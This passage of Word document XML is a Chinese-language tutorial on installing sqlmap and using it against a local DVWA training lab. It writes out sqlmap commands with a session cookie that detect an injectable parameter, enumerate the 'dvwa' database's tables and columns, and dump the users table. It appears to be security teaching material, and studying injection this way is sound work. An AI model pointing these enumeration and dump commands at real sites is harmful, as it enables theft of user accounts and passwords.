            <wp:extent cx="4905375" cy="2239753"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="131" name="图片 131" descr="C:\Users\hlgu\AppData\Local\YNote\data\hahacling@163.com\39998a51f0b24449aad159bc9dce242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gu\AppData\Local\YNote\data\hahacling@163.com\39998a51f0b24449aad159bc9dce242d\clipboard.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12470" cy="2242993"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc496014423"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. sqlmap的下载及安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:hyperlink r:id="rId249" w:history="1">
        <w:r w:rsidRPr="00515B74">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://sqlmap.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00515B74">
        <w:t>下载sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>解压SqlMap.zip里面的文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>找到你安装python的目录（python安装的默认路径是：C:\Python27中）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ED9233F" wp14:editId="3B29E0FC">
            <wp:extent cx="4467225" cy="3655705"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="132" name="图片 132" descr="C://Users/hlgu/AppData/Local/YNote/data/hahacling@163.com/0dd05da6a88d430ba30f393da0543a2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gu/AppData/Local/YNote/data/hahacling@163.com/0dd05da6a88d430ba30f393da0543a2a/clipboar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67225" cy="3655705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>在python文件夹中创建一个新的文件夹，并命名为“SqlMap”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>然后把之前2）步骤解压的SqlMap中的文件全部复制到C:\Python27\sqlmap文件夹中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50A8E6C2" wp14:editId="7AA977B1">
            <wp:extent cx="4467225" cy="3849935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133" name="图片 133" descr="C://Users/hlgu/AppData/Local/YNote/data/hahacling@163.com/3c92a96b256246228757131171347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lgu/AppData/Local/YNote/data/hahacling@163.com/3c92a96b2562462287571311713471db/clipboard.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0893" cy="3853096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>在桌面空白处右键创建一个新的快捷方式：并命名为“Sqlmap”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5261ABA0" wp14:editId="0801E960">
            <wp:extent cx="4671425" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="134" name="图片 134" descr="C://Users/hlgu/AppData/Local/YNote/data/hahacling@163.com/683aa8721e124b77a57f757ebdedf0e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lgu/AppData/Local/YNote/data/hahacling@163.com/683aa8721e124b77a57f757ebdedf0ea/clipboard.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71425" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>这里我们需要修改2个地方，一个是“目标”，一个是“起始位置”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>如图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C62CFF5" wp14:editId="05D0B9CE">
            <wp:extent cx="3210898" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="135" name="图片 135" descr="C://Users/hlgu/AppData/Local/YNote/data/hahacling@163.com/139aa7c6751a46f0bc5ce3ccf2c9e9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lgu/AppData/Local/YNote/data/hahacling@163.com/139aa7c6751a46f0bc5ce3ccf2c9e981/clipboar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0898" cy="3876675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>创建好之后，运行你刚才创建的SqlMap快捷方式 这样就可以在Windows运行SqlMap了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>执行命令：python sqlmap/sqlmap.py -help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3374D879" wp14:editId="24A15C1F">
            <wp:extent cx="5105400" cy="2965921"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="136" name="图片 136" descr="C://Users/hlgu/AppData/Local/YNote/data/hahacling@163.com/70ca7efa58ba4b76a8d170f62a5daa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lgu/AppData/Local/YNote/data/hahacling@163.com/70ca7efa58ba4b76a8d170f62a5daa40/clipboard.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9777" cy="2968464"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc496014424"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="46" w:name="_Toc499884716"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc496014425"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 查找注入点</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>打开wireshark，监视lo网卡（因为是本机）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>在DVWA的SQL Injection页面上有一个userid输入框，随便输入然后点击submit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D57D3A6" wp14:editId="0D5F5E99">
            <wp:extent cx="4162427" cy="284287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163326" cy="2843493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>在wireshark中可以找到GET信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>其中有Request URI和Cookie信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EBCDE83" wp14:editId="4EB113A4">
            <wp:extent cx="5238750" cy="4010267"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="142" name="图片 142" descr="C:\Users\hlgu\AppData\Local\YNote\data\hahacling@163.com\158c7e3a20144a8095e59ca06637634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gu\AppData\Local\YNote\data\hahacling@163.com\158c7e3a20144a8095e59ca066376343\clipboar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38750" cy="4010267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>Cookies：PHPSESSID=s87ff7rjp3ta76v77f9rpf6jg7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>使用sqlmap查找注入点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>sqlmap.py -u "http://localhost/DVWA-1.9/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=s87ff7rjp3ta76v77f9rpf6jg7"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>得到可能的注入点是id，数据库是mysql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>[INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">[INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>injectable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc496014426"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. sql注入案例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>1）sqlmap.py -u "http://localhost/DVWA-1.9/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=s87ff7rjp3ta76v77f9rpf6jg7" --current-db </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>得到当前数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>current database: 'dvwa'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>2）sqlmap.py -u "http://localhost/DVWA-1.9/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=s87ff7rjp3ta76v77f9rpf6jg7" --current-db --tables -Ddvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>使用dvwa库得到表名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>Database: dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>[2 tables]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+-----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| guestbook |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| users     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+-----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>3）sqlmap.py -u "http://localhost/DVWA-1.9/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=s87ff7rjp3ta76v77f9rpf6jg7" -T guestbook --columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>得到guestbook的表结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Database: dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Table: guestbook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>[3 columns]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+------------+----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| Column | Type |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+------------+----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| comment | varchar(300) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| comment_id | smallint(5) unsigned |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| name | varchar(100) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+------------+----------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>得到users表结构:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>Database: dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>Table: users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>[6 columns]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+------------+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| Column | Type |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+------------+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| user | varchar(15) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| avatar | varchar(70) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| first_name | varchar(15) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| last_name | varchar(15) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| password | varchar(32) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| user_id | int(6) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>+------------+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>4）sqlmap.py -u "http://localhost/DVWA-1.9/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=s87ff7rjp3ta76v77f9rpf6jg7" -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>得到users表的内容</w:t>
      </w:r>
    </w:p>
